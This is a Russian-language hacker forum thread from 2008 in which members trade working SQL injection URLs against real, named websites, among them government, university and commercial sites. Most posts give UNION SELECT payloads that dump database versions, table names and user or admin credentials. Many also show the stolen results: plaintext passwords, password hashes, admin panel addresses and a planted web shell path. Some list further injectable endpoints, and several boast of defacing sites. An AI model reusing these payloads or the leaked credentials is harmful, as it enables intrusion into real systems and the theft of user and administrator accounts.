http://rishelie.ru/pages/galery.php?gid=-1+union+select+0,concat(id,char(20,58,20),name,cha r(20,58,20),login,char(20,58,20),password),2,3,4,5 ,6,7,8+from+std_users+where+id=43/*
(шелл http://rishelie.ru/img_tmp/catalog_910_777.php)

http://wplanet.ru/index.php?show=news&id=36&dep=-1+union+select+0,1,concat(id,char(20),name,char(20 ),login,char(20),pass),3,4+from+users/*

еще завалялось, может чтот уже не пашет)

http://www.canadianheli-skiing.com/forum-comment.php?id=-1+union+select+0,1,2,3,table_name,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19+from+information_schema.ta bles+limit+16,1/*
> admin, availablity, forums, users

http://www.canadianheli-skiing.com/forum-comment.php?id=-1+union+select+0,1,2,3,column_name,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19+from+information_schema.c olumns+where+table_name=users/*

http://www.thesimexchange.com/community-comment.php?id=-1+union+select+0,1,2,3,4,5,6,7,8,9+from+accounts/*

http://intranet.library.arizona.edu/spendingReduction/comment.php?id=-1+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18/*

http://blog.orskov.net/comment.php?id=9999999+union+select+0,1,2,3,4,5,6/*

http://se-center.pl/articles.php?topic=0+union+select+1,concat(id,char (58),nick,char(58),pass),3,4,5+from+jp_admins+limi t+0,2/*

http://bayoupublishing.com/?file=static_content&page_id=-1+union+select+0,vemail,2,vpassword,4,5+from+admin/*

http://georgiatechrugby.com/wraps/score.php?id=-1+union+select+0,1,2,3,4,5,6,7,DATABASE(),9/*

http://gop-online.com.ua/index4room.php?Subject=ListUsers&UserId='+union+select+concat(UserId,char(58),UserP assword)+from+users+into+outfile+'content/1.php'/*

fobofob

11.05.2008, 23:00

Центральное командование ВС США

http://www.centcom.mil/index.php?option=com_multimedia&task=view&id=-108+union+select+1,2,concat(username,0x3a,password ),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+ from+jos_users/*&Itemid=65&lang=ru

8)

S00pY

12.05.2008, 16:23

http://www.techboard.ru/thread.php?cid=-11+union+select+concat_ws(0x3a,version(),database( ),user())/*

http://www.i-market.ru/newsleech/?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6/*

m0use

12.05.2008, 16:27

http://msk.geometria.ru/index.php?show=newstruct&newstruct=8+un ion+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,versio n(),user(),database()),11/*
version(): 5.0.22-log
user(): geometria@client132-50.cmk.ru
database(): geometria

m0use

12.05.2008, 16:57

_http://davalka.com.ua/page1.php?nag=-27+uni on+select+1,2222,3,4,concat_ws(0x3a,table_schema,t able_name,column_name),6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,233333,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,4 8,49,50,51,52,5333,54,55,56+from+information_schem a.columns/*&te=8

S00pY

12.05.2008, 17:24

_http://www.nin.ru/articles/?id=-1+union+select+1,2,concat_ws(0x3a,name,email)+from +users/*

version:5.0.32-Debian_7etch5-log
не особо копался!
Поле не имеет ограничений - нету гемора с лимитом!

samarin

12.05.2008, 19:04

Автозапчасти
http://www.avtozapchasty.ru/autobook/rubr.php?idcbrand=-26+UNION+SELECT+1,aes_decrypt(aes_encrypt(version( ),0x71),0x71),3,4,5/*

4.1.13a-nt-max-log
1gb_cck135book@10.0.1.13
1gb_cck135book

swt1

12.05.2008, 23:44

http://www.nevahotels.ru/metrohotels222.html

swt1

13.05.2008, 00:21

http://romatizma.dergisi.org/pdf.php3?id=98?ref=BenimShopum.com

z1k

13.05.2008, 01:52

http://www.eartcenter.ru/content.php?cat_id=1&id=4+union+select+1,2,version(),4,5,6/*
===========
eartcenterru@78.108.81.111
4.1.21-log
eartcenterru
===========
зы
мой первый самастаятельный шаг в скулях
и наткнулся на 4х а я умею токо с схемой табл. переберать может мне ктото дать инфы или росказать как переберать таблицы в 4х версиях сменя плусекии:))

Haruka

13.05.2008, 10:13

кто в мускул инъекциях хорошо шарит стукните пожалуйста в асю 444девять7778два

Gorev

13.05.2008, 12:11

http://www.peaceforum.pk/pages/article_details.php?d_id=-2+union+select+1, 2,table_name,4,5+from+information_schema.t ables/*

http://www.peaceforum.pk/pages/article_details.php?d_id=-2+union+select+1,2,co lumn_name,4,5+from+information_schema.columns+wher e+table_name=0x6 d656d62657273+/*

version : 5.0.45-community
user : caravaan_naveed@localhost
database : caravaan_peace

Gorev

13.05.2008, 12:21

http://www.fwo.com.pk/galleries.php?page=4&type=viewEvents&gid=-1+union+select+1,2 ,3,4,5,6/*
version: 4.1.22-standard
user : fwo_fwo@localhost
database : fwo_fwo

Gorev

13.05.2008, 12:36

http://brianoshomedecor.com/category.php?parentId=-162+union+select+1,table_name,3+from+information_s chema.tabl es/*

http://brianoshomedecor.com/category.php?parentId=-162+union+select+1,colum n_name,3+from+information_schema.columns+where+tab le_name=0x7573657273/*

http://brianoshomedecor.com/category.php?parentId=-162+union+select+1,concat_ws(0x3a,id,login,passwor d),3+from+users/*

admin: 1million
http://brianoshomedecor.com/admin/login.php

kinderi go go go ... =)

K1nD[e]R

13.05.2008, 18:04

http://www.fischeraudio.ru/profile.php?id=-20+union+select+1,concat_ws(0x2F,version(),user()) ,concat_ws(0x2F,login,pass),4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22+from+admins/*

Version: 5.0.45-log/u58906@10.10.223.221

Admins:

Admin 06d961d7ed6f6ee3b9734101f3b26dd3

Gorev

13.05.2008, 18:43

http://www.primaria-navodari.ro/?do=anunt&no=-40+union+select+1,2,3 ,4,5,6--

version: 5.0.45-community
user: primaria_root@localhost
database: primaria_primaria

запрос : http://www.primaria-navodari.ro/?do=anunt&no=-40+union+select+1,2,table_name,4,5 ,6+from+information_schema.tables/* выбросил меня на страничку
Nr=406 Not Acceptable

подставив from+users-- ошибки не было,тогда я попробовал:
http://www.primaria-navodari.ro/?do=anunt&no=-40+union+select+1,2 ,concat_ws(0x3a,user,0x3a,pass),4,5,6+from+users/*

все нормально ....
admin:vFO1gTxJZCdiwlExlAVSPjmeYXY

админка: http://www.primaria-navodari.ro/index.php?do=page&no=a

Gorev

13.05.2008, 19:05

http://www.dreptonline.ro/stiri/detaliu_stire.php?id_stire=-652+union+select+1,2,3,4,5 ,6,7/*

version :4.1.22-standard
user: dreptonl_dr@localhost
database: dreptonl_dr

Gorev

13.05.2008, 19:26

http://www.oferta9.ro/magazin2.php?m=-1951+union+sele ct+1,2,3,4,5,6,7,8,9,0,1,2,3,4, 5/*

version :5.0.45-community
user : mn76_iuser@localhost
database: mn76_iuser

Gorev

13.05.2008, 19:35

сайт джорджа сороса

http://www.osf.ro/ro/program.php?program=-30+union+select+1,2, 3,4,5,6/*
version: 4.0.18
user: sitenou@localhost
database: site2007

†c0(aIn?†

13.05.2008, 20:05

http://www.gans-club.ru/catalogue.php?id=-1+union+select+1,2,3,5,6,7/*

version: 5.0.24-standard
user: gansclub1@localhost
db: db_gansclub1

http://www.gans-club.ru/admin/

Админ-лох....мухахаха

ЗЫ: Как увидел,сколько у них сиги стоят,сразу решил:надо ломать)))

neon_fx

14.05.2008, 00:16

http://www.atur.com.ua/index.php?id=-903+union+select+1,2,3,4,5,6+from+users/*

atur@localhost
4.1.22
atur

Grema

14.05.2008, 00:59

какая та игра) посещаемость 0.

http://g1.rezni.net/forum/post.php?a=new_post&forum=-1+UNION+SELECT+null,concat(login,':',pass),null,nu ll+From+users+limit+0,1/*
rezninet_sred@localhost
4.1.21
rezninet_game

neon_fx

14.05.2008, 01:43

Онлайн игра
Мир гладиаторов

http://sotovikmar.nov.ru/forum/post.php?a=new_post&forum=-1+union+select+1,concat_ws(char(58),name,pass),3,4 +from+users+limit+1+offset+2/*

kaskara_sotm@localhost
4.1.21-standard
kaskara_sotm

S00pY

14.05.2008, 12:01

http://www.agarev.com/website.php?id=-1+union+select+1,lgn,pswd,4+from+agrv_user/*
Вывод в саммом низум под баннерами!

Vid0k

14.05.2008, 23:52

одна почти раскрученная остальные нет просто не успел решил выложить чтобы не валялись без дела
и так поехали:
http://www.quicktech.com.tw/eshop_en/class_b.asp?ID=47'
=
[Microsoft][ODBC SQL Server Driver][SQL Server]? nvarchar ?? 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Personal Edition on Windows NT 5.2 (Build 3790: Service Pack 2) '
=
БД-'DataSQL_eshop_EN'
таблицы и поля:
AD
AdMail
Classl
Employees
News
QA
ActionCount
ADRecord
ClassII
comd_list
Company
D99_CMD
D99_Tmp
dtproperties
EditRecord
GroupMember
LoginRecord
Member(ID,GID,MemberType,UserName,PassWord,Name,Pe tName,Sex,Phone,Birthday,Mobile,EMail,Address,Memo 1,Memo2)
OrderRecord
Orders
Porduct
sysconstraints
syssegments
t_jiaozhu
не раскрученные внимание на некоторых пишутся логи об ошибках мускула заходить только через прокси:
http://eshop.i-cable.com/eshop/eng/index.php?cat_id=2&subcat_id=12'
=
http://www.rhysko.co.uk/eshop2.asp?category=2'
=
http://www.wohlfahrt.com/USA2004/ArtikelDetail.cfm?ArtikelIdentitaet=6034'&pSessionSessionID=84875494-usa-5555330527022008;eshop;2&pSessionKundenID=0&pSessionSprachID=2&Pfad=Spare%20Parts%20%26%23149%3B%20Pyramid%20Cand leholders
=
http://www.nebesa.com/eShop/Game.aspx?FamilyId=23&BrandId=6117'
=
http://eshop.whtt.org/eshop.php?id=28'
=
http://www.tashop.ru/order/frame.asp?id=97'
=
http://www.uniway.be/reference.aspx?id=239'
=
http://www.baymed.org/body.cfm?id=147'
=
http://shop.middleeast.com/detail.aspx?ID=935'
=
http://www.411asp.net/func/review?tree=411asp/webapps/shopping&id=6449910'
=
http://eshop.ecu.edu.au/shopdisplayproducts.asp?id=1'&cat=Fees+%26+Charges
=
http://www.littlelambstory.com/store/message.php?id=2'
=
http://www.80mbusmodel.com/eshop/ProductsList.aspx?ID=10'
=
http://www.obedienceuk.com/shop/products.asp?id=6'&cat=Puppies%20for%20Sale
=
http://www.realestatedynamics.com.au/eshop/shop_product.aspx?id=16'
=
http://www.galser-sib.ru/eshop/category.asp?id=183'
=
http://www.fastgear.biz/index.cfm?id=3974&pageid=123'
=
http://www.camperscorner.com.sg/eshop/product.php?id=2076'
=

LUKAC

15.05.2008, 01:28

Вот пак -)

http://www.flirtanica.ru/articles1.php?id=-203+union+select+1,2,3,4,version()/*
]http://www.oracul.kiev.ua/news_view.php?id=-140+union+select+1,2,3,4,5,version(),7/
]http://www.biblioteka-ua.com/select_biblio.php?id=1651+union+select+1,version() ,3,4,5/* -в самом низу вывод
http://eggs.com.ua/humor.php?id=-16+union+select+1,2,3,version(),5,6,7,8,9,10/*
]http://climb.com.ua/aboutbook.php?id=233+union+select+1,2,3,table_name ,5,6+from+information_schema.tables/*
http://www.mgz.com.ua/ogl_inet.php?ogl_id=-24387+union+select+1,2,3,4,5,version(),7,8,9,0,1,2 ,3/*
http://www.chatelet-theatre.com/fiche_spectacle.php?id=-146+union+select+1,2,3,4,5,6,7,version(),9,0,1,2,3 ,4,5,6,7,8,9,0,1,2,3,4,5,6,7/*
http://www.cahiersdufootball.net/article.php?id=-2728+union+select+1,2,3,version(),5,6,7,8,9,0,1,2, 3,4,5,6,7,8,9,0,1,2/*
http://www.frontnational.com/communique_detail.php?id=-1599+union+select+1,2,3,table_name+from+informatio n_schema.tables+limit+26,1/*
http://www.buchakademie.de/sem/sem.php3?id=-883+union+select+1,version(),3,4,5,6,7,8,9,0,1,2,3 ,4,5,6,7,8,9,0,1,2,3,4,5,6/*
http://www.imi-online.de/2008.php3?id=-1692+union+select+version(),2/*
http://www.echtenamen.de/kategorie.php4?id=19+union+select+1,version(),3,4/*
http://www.regenwald.org/news.php?id=777+union+select+1,2,3,4,5,6,table_nam e,8,9,0,1,2,3,4,5,6+from+information_schema.tables/*
http://www.tribaldance.com.ua/index.php?id=5+union+select+1,2,3,4/*
http://www.chicco.com.ua/faq2.php?id=1+union+select+1,version()/*
http://www.press.cv.ua/show_an.php?id=-1408+union+select+1,version()/*
http://cbn-cp.com/preview.php?id=-36+union+select+1,2,concat_ws(char(58),mail),4,5,6 ,7,8,9,0,1,2,3+from+mail/*
http://fri.net.ua/loadpsb.php?id=-520+union+select+1,2,3,concat_ws(char(58,58),userl ogin,userpsswd),5,6,7,8,9+from+users+limit+100,1/*
http://valiza.com.ua/opinions.php?id=-122+union+select+1,2,3,concat_ws(char(58,58),user_ id,username,password),5,6,7+from+phorum_users/*
http://www.aquariumist.com.ua/spr.php?id=-8+union+select+1,2,version()/*
http://www.doggy.kiev.ua/pages.php?id=4+union+select+1,2,version(),4,5/*
http://www.big6.com/showarticle.php?id=-16+union+select+version(),2,3,4,5/*
http://www.comingsoon.net/films.php?id=-15813+union+select+version()/*
http://www.michaelpollan.com/article.php?id=-80+union+select+1,version(),3,4,5,6,7,8,9,0/*
http://www.isoc.be/news.php?ID=-31+union+select+1,2,3,4,5,version(),7,8,9,0,1,2,3, 4,5,6,7,8/*
http://www.fcdynamo.ru/material.php?id=-642'+union+select+1,concat_ws(char(58),UserID,Logi n,Password),3,4,5,6,7,8+from+ut_users/*
http://www.energetika.cz/index.php?id=147+union+select+1,2,3,4,5,version(), 7,8,9,0/*
http://www.radiovaticana.cz/clanek.php4?id=9189+union+select+1,2,table_name,4, 5,6,7,8,9,0,1,2,3+from+information_schema.tables/*
http://www.management.com.ua/announce.php?id=150+union+select+1,2,3,concat(char (58),id,username,password),5+from+admins/* - 4 версия... лень таблицу было искать
http://www.jazz.koktebel.info/participant.php?id=11'+union+select+1,2,3,4,5,6,7, version()/*
http://ukrfoto.dp.ua/download.php?id=166+union+select+1,2,version(),4,5 ,6/*
http://www.haydamaky.com/ua/main.php?id=-392+union+select+1,2,3,4,version(),6,7,8,9/*
http://www.worstpreviews.com/review.php?id=-982+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,versi on(),31,32,33,34,35,36,37,38,39,40/*
http://www.roadtothemiddleclass.com/chappies.php?id=-84+union+select+version(),2,3/*
http://www.emap.usask.ca/news/read.php?id=-107+union+select+1,2,3,version(),5,6,7,8,9,10/*
http://www.bunny-comic.com/index.php?id=-1010+union+select+1,table_name,3,4,5,6,7+from+info rmation_schema.tables+limit+15,1/*
http://underwaredesign.com/prod_detail.php?id=-39+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,vers ion(),15,16,17,18,19/*
http://www.freepoc.org/viewapp.php?id=-2+union+select+1,2,3,4,5,6,7,version()/*
http://www.railpictures.net/viewphoto.php?id=-190094+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,table_name,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44 ,45,46,47+from+information_schema%20.tables/*
http://www.michaelpollan.com/article.php?id=-87+union+select+1,version(),3,4,5,6,7,8,9,10/*

]http://www.kiis.com.ua/index.php?id=2&sp=1+UNION+SELECT+1,2,3,4,Table_name,6,7,8,9+from+ information_schema.tables/*
http://chgk.com.ru/person.php?id=-600+UNION+SELECT+1,2,3,4,version(),6,7/*
http://kinoinet.tv/productinfo.php?id=-1446+UNION+SELECT+version(),2/*
http://abris.name/a-imglib/showimg.php?id=-21+union+select+1,2,version(),4,5,6,7,8/*
http://www.ecodefense.ru/view.php?id=-526+union+select+1,2,3,4,5,6,7,8,9,version(),11/*
птом добавлю есчё

http://www.ukrbiznes.com/website.php?id=66551+union+select+version(),2,3,4, 5,6,7,8,9,0,1,2/* - кому не лень обходить фильтрацию... 12 таблиц ... !
http://www.ukrnic.com/hosting_info.php?id=2+union+select+1,2,version()/*

================================================== ================================================== ===========
http://www.zcasher.info/products.php?id=4'+union+select+1,2,3,table_name,5 ,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+inform ation_schema.tables/*
обменный пункт вмз
таблицы снизу , выбрал всю связаное с юзерами

cap_partners
cap_users
exch_clients
zmc2_adminusers
zmc2_users
uab_partners
================================================== ================================================== ===========

lastsmile

15.05.2008, 05:14

http://www.flipskateboards.com/news.php?id=-9999'+union+select+table_name,column_name+from+inf ormation_schema.columns+limit+264,1/*

http://www.flipskateboards.com/admin/
login/pass: arjan

----------------

http://www.classicalsource.com/db_control/db_cd_review.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,id,password ,user_name,15,16,17,18,19,20,21,22,23+from+user+li mit+0,1/*

http://www.classicalsource.com/admin/site_admin.php
login: davef
pass: qpd45122

neon_fx

15.05.2008, 13:45

http://www.infra-m.ru/live/news.asp?date=03.03.2008&id=471468+or+1=@@version--

SQL Server 2005 - 9.00.3054.00 (X64) Mar 23 2007 18:41:50 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)

//******************************
http://www.rkgarant.ru/news.asp?id=376+or+1=@@version--

'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Workgroup Edition on Windows NT 5.2 (Build 3790: Service Pack 1)

http://www.rkgarant.ru/news.asp?id=376+or+1=(SELECT+TOP+1+TABLE_NAME+FROM +INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN +(SELECT+TOP+32+TABLE_NAME+FROM+INFORMATION_SCHEMA .TABLES+WHERE+TABLE_NAME+NOT+IN+(0x2345)))--
таблица юзеров

Momiji

15.05.2008, 19:55

aiman.eu
http://www.aiman.eu/index.php?id=-1+union+select+1,2,3,concat_ws(0x3,version(),user( ),database()),5,6,7,8,9,10/*

4.0.27-max-logdbo161593031@212.227.109.33db161593031
http://www.aiman.eu/index.php?id=-1+union+select+1,2,3,concat(login,0x3,pass),5,6,7, 8,9,10+from+admin/*
aimanff8ac4f495af20f4a7c63d4644d568b5:schmann
Админка: http://www.aiman.eu/admin/

Gorev

15.05.2008, 19:56

http://www.atlasmonde.net/pays.php?idp=-1+union+select+1,2,3,table_name,5,6,7,8,9,0,1,2,3, 4,5,6,7+from+in formation_schema.tables+limit+18,1/*

version: 5.0.22
user : altasmonde_user@localhost
database : altasmonde_base

neon_fx

15.05.2008, 20:57

интернет-трейдинг

http://www.netinvestor.ru/news.asp?id=851142+or+1=@@VERSION

'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

Юзеры и пасы
http://www.netinvestor.ru/news.asp?id=851142+or+1=(SELECT+TOP+1+password+fro m+usertable+WHERE+password+NOT+IN+(SELECT+TOP+10+p assword+from+usertable+WHERE+password+NOT+IN+(0x23 )))--

Gorev

15.05.2008, 22:35

http://www.comeniuskft.hu/main.php?kozepre=kereskedelmi&kategoria=-7+union+select+1,2,3,table_name,5,6, 7,8+from+information_schema.tables+l imit+16,1/*
нужная нам табла

http://www.comeniuskft.hu/main.php?kozepre=kereskedelmi&kategoria=-7+union+select+1,2,3,column_name,5,6,7,8+from+info rmation_schema.columns+where+table_name=0x61646d69 6e/*

0x61646d696e = admin

http://www.comeniuskft.hu/main.php?kozepre=kereskedelmi&kategoria=-7+union+select+1,2,3,concat_ws(0x3a,nick,password) ,5,6,7,8+from+admin/*

вот собственно и все что надо....

ах да, совсем забыл

http://www.comeniuskft.hu/admin.php

neon_fx

15.05.2008, 23:13

http://www.win-developers.com/forum/show.asp?id=606&fid=178++or+1=@@version--

'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.2 (Build 3790: Service Pack 2)

Gorev

15.05.2008, 23:25

http://www.motorcitysuns.com/team.php?id=-1+union+sel ect+1,,2, 3,4/*

version: 4.1.22-standard-log
user : oaklands_1@localhost
database : oaklands_1

Mr. P.S.

16.05.2008, 00:02

fexco.com
the global payments group

http://www.fexco.com/viewjob.php?id=-105+union+select+1,2,concat_ws(0x3203a20,version() ,user(),database()),4,5,6,7,8,9,10,11,12,13,14,15/*
version: 5.0.45-community-log
user: splashg_fexco@web3.hosting365.ie
database: splashg_fexco

http://www.fexco.com/viewjob.php?id=-105+union+select+1,2,table_name,4,5,6,7,8,9,10,11, 12,13,14,15+from+information_schema.tables+limit+1 ,1/*

neon_fx

16.05.2008, 02:00

РОСТОВСКИЙ ЮРИДИЧЕСКИЙ ИНСТИТУТ МВД РОССИИ

http://www.rui.rsd.ru/print/news.asp?newsId=5698+or+1=@@version--

'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

http://www.rui.rsd.ru/print/news.asp?newsId=5698+or+1=(select%20db_name())--
DB- rui
User-SITE\IUSR_WEB3

Gorev

16.05.2008, 13:18

http://haberolay.net/detay.php?id=-6389+union+select+1,2,3,4,table_name,6, 7,8,9+from+information_schema.tables+limit+160,1/*

http://haberolay.net/detay.php?id=-6389+union+select+1,2,3,4,column_name,6, 7,8,9+from+information_schema.columns+where+table_ name=0x62775f75736572/*

http://haberolay.net:2082/login/

version : 5.0.45-community
user : haberola_osman@localhost
database :haberola_osman

neon_fx

16.05.2008, 21:20

//*********************************

http://www.skyphoto.ru/forum/post.php?a=new_post&forum=-3+union+select+1,concat_ws(char(58),username,passw ord,email),3,4+from+u9758.sp_users+limit+1/*
forum: admin:AV-natali

//************************************

http://tchirkounov.ru/forum/post.php?a=new_post&forum=-2+union+select+1,version(),3,4/*
4.0.24_Debian-10sarge3
chirnalog@localhost
dbchirnalog

//***************************************
http://www.is.ru-b.de/gboard/post.php?a=new_post&forum=-3+union+select+1,version(),3,4/*
4.0.27-standard-log
p6866052@212.227.109.41
db18967113
//**************************************
http://wikipediawiki.org/post.php?a=new_post&forum=-1+union+select+1,version(),3,4
5.0.54
ulrik_db0@88.214.192.23
ulrik_db0

//***************************************
http://www.hurstwoodfarmpianos.co.uk/news.php?news_id=-16+union+select+1,2,concat_ws(char(58),username,pa ssword),4,5,6,7,8,9,10+from+user+limit+1+offset+0/*
marcus68:jerseybean
nawaraj:samsanjog
dain:cobnuts

pingpong@localhost
4.1.20
piano
Apache/2.0.52 (Red Hat)

//****************************
http://www.atur.com.ua/index.php?id=-903+union+select+1,2,3,4,5,6+from+users/*

atur@localhost
4.1.22
atur

Mr. P.S.

17.05.2008, 00:59

medinform.biz

http://www.medinform.biz/produser1.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6,7,8,9,10,11,12,13/*

4.1.22 : medinfo5main@localhost : medinfo5main

далее:

http://www.medinform.biz/produser1.php?id=-1+union+select+1,2,concat(name,0x3a,pas),4,5,6,7,8 ,9,10,11,12,13+from+users/*

Администратор : 123456789

=)

swt1

17.05.2008, 20:31

http://board.barnaul-altai.ru/index.php?advert=1837+union+select+1,2,3,4,5,6,7,8 ,9/*

†c0(aIn?†

18.05.2008, 12:21

Какой-то шоп бытовой техники с весьма экзотическим названием):

http://morozilnik.ru/eng/info/?code=1+union+select+1, 2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37, 38,39,40,41,42/*

5.0.32-Debian_7etch3-log
morozini@localhost
morozini

MaSter GeN

18.05.2008, 19:55

revolution.co.uk

http://www.revolution.co.uk/_forum.php?neuron=1&topic=4981&message=-58008 union select 1,2,3,aes_decrypt(aes_encrypt(version(),0x71), 0x71),5,6,7,8,9/*

"4.1.11-Debian_4sarge8-log"
"revuser@localhost"
"lucybase"

P.s из той же серии ;)

http://www.720games.com/_forum.php?neuron=1&topic=2&message=12'
http://www.yorkshirekoi.co.uk/_forum.php?neuron=6&topic=20558&message=164530'

Snap

19.05.2008, 14:53

Продажа авто в спб!

http://www.autoway.spb.ru/show.php?id=-142+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,concat(table_schema,0x3a,table_name,0x3a,column _name),17,18+from+information_schema.columns+limit +191,1/*

http://www.autoway.spb.ru/show.php?id=-142+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,concat(table_schema,0x3a,table_name,0x3a,column _name),17,18+from+information_schema.columns+limit +192,1/*

http://www.autoway.spb.ru/show.php?id=-142+union+select+1,2,3,4,5,6,7,8,9,us_login,us_pas s,12,13,14,15,16,17,18+from+x7_ows_user/*

http://www.autoway.spb.ru/admin/
Login: Admin
Pass: admin1

Gorev

19.05.2008, 23:06

http://www.trekstor.de/en/products/detail_hdd.php?pid=-15+union+select+1,us er(),3,4,5,6,7,8,9,0,1,2,3,4,5,6 ,7,8,9,0,1,2,3,4,5,6/*

version: 4.0.27-standard
user : dbo175992425@localhost
database :db175992425

зы спасибо всем тем кто оценивает мою работу плюсами.

Dr.Frank

20.05.2008, 13:40

Закладки:
http://www.social-bookmarks.ru/?item_id=99999999999999+union+select+1,convert(con cat(database(),0x09,user(),0x09,version())+using+c p1251),3,4+limit+0,1--

Gorev

20.05.2008, 14:18

http://www.rededular.com.br/catalogo-sec.php?codcat=3&codsec=-60+uni on+select+1,2,3,4,5,6,table_name,8,9,0,1,2,3,4,5,6 ,7,8,9,0,1+from+infor mation_schema.tables+lim it+1,1/*

version:5.0.22
user:rededular@localhost
database : rededular

ну а дальше все зависит от вашей фантазии

Mr. P.S.

20.05.2008, 19:20

heavymetalsociety.org

http://www.heavymetalsociety.org/interview.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6/*
4.1.22standard:heavymet@localhost:heavymet_hmssite

http://www.heavymetalsociety.org/interview.php?id=-1+union+select+1,2,3,concat(user,0x3a,pass),5,6+fr om+users+limit+1,1/*
Первые 10 юзеров:
duncang:f02937159a1e31d72c7114bfe2d83015::renegade s: - админ
Sanitarium:44a4dc99148a7577f78578177202dd7b:::
Colm C:eb95fc1ab8251cf1f8f870e7e4dae54d::megadeth:
The Noonster:f1a81d782dea6a19bdca383bffe68452::spider:
apoc:a25e01bddca85cdf4a4a3dafdd3aaa05::apoc:
Decrepit:2ccd23d1cd0f95dc6984215a1f1b31ca::sludge:
GravesOfYourMother:594bca3f02fc8fcfe8133ce01b4e3f4 3::graves:
Retorzio:fea1804c38c3e141e51894528967c4dc:::
Tsunekuni:597cee5b6e97930735991ad87fd423bc:::
Vagina Squasher:aa2d6e4f578eb0cfaba23beef76c2194::free:

Momiji

20.05.2008, 21:47

best49.eu
http://www.best49.eu/index.php?cat=-1+union+select+1,concat_ws(0x3,version(),user(),da tabase()),3/*
4.1.22-standardbest49e_user1@localhostbest49e_best49
http://www.best49.eu/index.php?cat=-1+union+select+1,concat(username,0x3,passwd),3+fro m+users/*
webmastertest
b490ubgjhmix
b49101gtarqlud

Gorev

21.05.2008, 00:16

http://www.posugf.com.br/site_2008/curso.php?ID_Curso=-103+uni on+select+1,2,3,4,5--

version : 4.1.13-Debian_0.dotdeb.1-log
user : sistema@192.168.0.254
database: sistema_homologacao

Gorev

21.05.2008, 00:41

http://www.nelore.com/fazendas/luzz/novo/galeria_conteudo.php?areaid=-1+union+select+1,ta ble_name,3,4,5,6 ,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0+f rom+information_schema.tables+limit+28,1/*

http://www.nelore.com/fazendas/luzz/novo/galeria_conteudo.php?areaid=-1+union+select+1,column_name,3,4 ,5,6,7,8 ,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0+from+ information_schema.columns+where+table_name=0x6162 637a5f7573756172696f+limit+1,1/*

http://www.nelore.com/fazendas/luzz/novo/galeria_conteudo.php?areaid=-1+union+select+1,concat_ws(0x3a,no me,0x3a,email,0x3a,senha,0x3a,login),3, 4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8, 9,0+from+abcz_usuario+limit+0,1/*

version :5.0.27-community-nt-log
user: nelore1@localhost
database: nelore1

ЗЫ Мне очень не нравится когда после того как я выложил на ачат скулю, какой нибудь киндер быстренько дефейснет сайт...выкладывать админку не буду.. уж извините.Всего доброго !